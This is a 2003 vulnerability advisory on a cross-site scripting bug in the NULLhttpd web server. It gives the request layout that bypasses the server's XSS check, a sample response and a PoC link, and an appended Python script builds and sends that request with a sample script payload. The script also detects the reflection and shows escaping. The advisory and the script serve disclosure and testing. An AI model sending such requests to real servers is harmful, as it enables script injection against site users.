#######################################################################

                            Luigi Auriemma

Application:  NULLhttpd
              http://nullhttpd.sourceforge.net/httpd/
Versions:     <= 0.5.1
Platforms:    All supported (Win & Unix)
Bug:          Cross site scripting
Date:         24 Sep 2003
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

"Null httpd is a very small, simple and multithreaded web server for
Linux and Windows."

However, as its author Dan Cahill states, the server was not developed
for production use, nor with quality and security as goals.

#######################################################################

======
2) Bug
======

This is not the first XSS (cross site scripting) bug found in NULLhttpd:
the same issue was fixed in version 0.5.1, released one year ago, but
some "problems" in the code let it reappear (it also existed in earlier
versions).

The cause is that an overly long HTTP request overwrites some string
data in memory (I have not debugged it, so no further details are given
here). The effect is that the check NULLhttpd performs to prevent XSS is
bypassed, and the returned 400 (Bad Request) error page contains the
injected XSS code.
Example:

  http://server/[1799 bytes][243 bytes]
                 |           |
                 |           here starts the XSS code, which can be
                 |           at most 243 bytes long
                 |
                 chars needed to avoid the XSS check

Answer from NULLhttpd:

----
HTTP/1.0 200 OK
Cache-Control: no-store
Connection: Close
Content-Length: 472
Date: Tue, 23 Sep 2003 11:39:30 GMT
Expires: Tue, 23 Sep 2003 11:39:30 GMT
Last-Modified: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaano-cache
Pragma: no-cache
Server: Null httpd 0.5.1
Content-Type: text/html

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx400 Bad Request

400 Bad Request

Can't Parse Request.
Null httpd 0.5.1
----

Note that the status line reads 200 OK although the body is the 400
error page, and that the Last-Modified header value has been overwritten
by bytes from the request: that overwritten header is the visible
symptom of the memory overwrite described above.

#######################################################################

===========
3) The Code
===========

Exploiting the problem is trivial; nonetheless I have released an HTML
file with a link that does the work (it uses 127.0.0.1 as the server,
so modify it as needed):

  http://aluigi.org/poc/nullhttpd051-xss.htm

#######################################################################

======
4) Fix
======

No fix. The author was notified over 10 days ago but I have not yet
received a response.

#######################################################################
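The request shape from section 2 and the unescaped reflection it relies on, as an added Python example written for this page (it is not the advisory's PoC file and not NULLhttpd's code). The sizes 1799 and 243 come from the advisory; the function names, the sample payload, the filler byte and the sample response are constructed here for illustration, and treating the leading "/" as not counting toward the 1799 filler bytes is an assumption the advisory does not settle.

```python
"""Added example for the NULLhttpd <= 0.5.1 XSS advisory above.

Builds the oversized request the advisory describes (1799 filler bytes,
then up to 243 bytes of script), optionally sends it, and checks whether
a reply echoes the script unescaped. Only the two sizes come from the
advisory; everything else here is constructed for illustration.
"""
import html
import re
import socket

PAD_LEN = 1799       # filler bytes before the script, as given in the advisory
PAYLOAD_MAX = 243    # maximum script length the advisory reports

# Constructed payload for illustration; not the PoC file linked above.
PAYLOAD = b"<script>alert(document.domain)</script>"


def build_request(host: str, payload: bytes, pad_len: int = PAD_LEN,
                  pad_byte: bytes = b"x") -> bytes:
    """Build the oversized GET the advisory describes: the path is pad_len
    filler bytes followed by the script. Whether the leading '/' counts
    toward the 1799 is not stated in the advisory; here it does not
    (assumption), and the filler byte is a parameter for the same reason."""
    if len(pad_byte) != 1:
        raise ValueError("pad_byte must be exactly one byte")
    if len(payload) > PAYLOAD_MAX:
        raise ValueError(f"payload exceeds {PAYLOAD_MAX} bytes")
    path = b"/" + pad_byte * pad_len + payload
    return (b"GET " + path + b" HTTP/1.0\r\n"
            b"Host: " + host.encode("ascii") + b"\r\n\r\n")


def split_response(raw: bytes):
    """Split a raw HTTP response into (status line, {header: value}, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return lines[0].decode("latin-1"), headers, body


def payload_reflected(raw: bytes, payload: bytes) -> bool:
    """True when the body echoes the script byte-for-byte, i.e. the server
    copied the request into its error page without HTML-escaping it."""
    _, _, body = split_response(raw)
    return payload in body


_RUN = re.compile(rb"(.)\1{31}")  # 32 or more identical consecutive bytes


def header_clobbered(raw: bytes) -> bool:
    """Flag the symptom visible in the advisory's sample response: a long
    run of filler bytes leaking into a header value (Last-Modified there)."""
    _, headers, _ = split_response(raw)
    return any(_RUN.search(v.encode("latin-1")) for v in headers.values())


def safe_error_body(request_line: bytes) -> bytes:
    """The hardened way to reflect a request into an error page: escape it
    before embedding, so '<script>' is rendered as text, not executed.
    This is an added illustration of the general fix, not NULLhttpd's code."""
    shown = html.escape(request_line.decode("latin-1"), quote=True)
    return (b"<html><head><title>400 Bad Request</title></head><body>"
            b"<h1>400 Bad Request</h1><p>Can't Parse Request: "
            + shown.encode("latin-1") + b"</p></body></html>")


def probe(host: str, port: int, payload: bytes = PAYLOAD, timeout: float = 5.0) -> bytes:
    """Send the crafted request to a live server and return the raw reply."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_request(host, payload))
        chunks = []
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks)


# Constructed sample response modelled on the one in the advisory (a run of
# request bytes spilled into Last-Modified, script echoed in the 400 body).
SAMPLE_RESPONSE = (
    b"HTTP/1.0 200 OK\r\n"
    b"Server: Null httpd 0.5.1\r\n"
    b"Last-Modified: " + b"a" * 64 + b"no-cache\r\n"
    b"Content-Type: text/html\r\n\r\n"
    + b"x" * 200 + PAYLOAD + b"400 Bad Request\r\n"
)


if __name__ == "__main__":
    req = build_request("127.0.0.1", PAYLOAD)
    print(f"request is {len(req)} bytes")
    print("reflected:", payload_reflected(SAMPLE_RESPONSE, PAYLOAD))
    print("header clobbered:", header_clobbered(SAMPLE_RESPONSE))
    print("escaped page still contains raw script:",
          PAYLOAD in safe_error_body(b"GET /" + PAYLOAD + b" HTTP/1.0"))
```

The checks run offline against the constructed sample; probe() exists for a host you are authorised to test. safe_error_body() shows the general remedy for a reflected error page (escape request bytes before embedding them in HTML); the advisory itself reports no vendor fix, and this function is not one.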